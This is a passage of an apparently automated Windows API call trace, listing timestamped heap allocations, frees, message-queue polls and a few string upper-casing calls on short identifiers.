lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0202.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0202.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0202.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0202.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0202.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0202.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0202.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0202.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0202.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0202.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0202.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0202.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0202.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0202.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0202.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0202.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0202.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0202.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0202.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0202.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0202.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0202.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0202.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0202.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0202.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0202.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0202.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0202.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0202.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0202.851] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0202.851] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0202.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0202.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa98 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0202.851] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0202.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0202.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0202.851] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0202.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0202.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0202.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0202.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0202.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0202.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0202.852] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0202.852] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0202.852] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0202.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0202.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaac8 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74088 [0202.852] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0202.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0202.852] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0202.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0202.853] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0202.853] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0202.853] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0202.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0202.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0202.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0202.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0202.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0202.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0202.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0202.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0202.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0202.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0202.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0202.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0202.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0202.854] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0202.854] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0202.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0202.854] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0202.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa888 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74238 [0202.855] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0202.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0202.855] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0202.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0202.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0202.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0202.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0202.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0202.855] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0202.855] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0202.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0202.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0202.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0202.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0202.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.856] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, 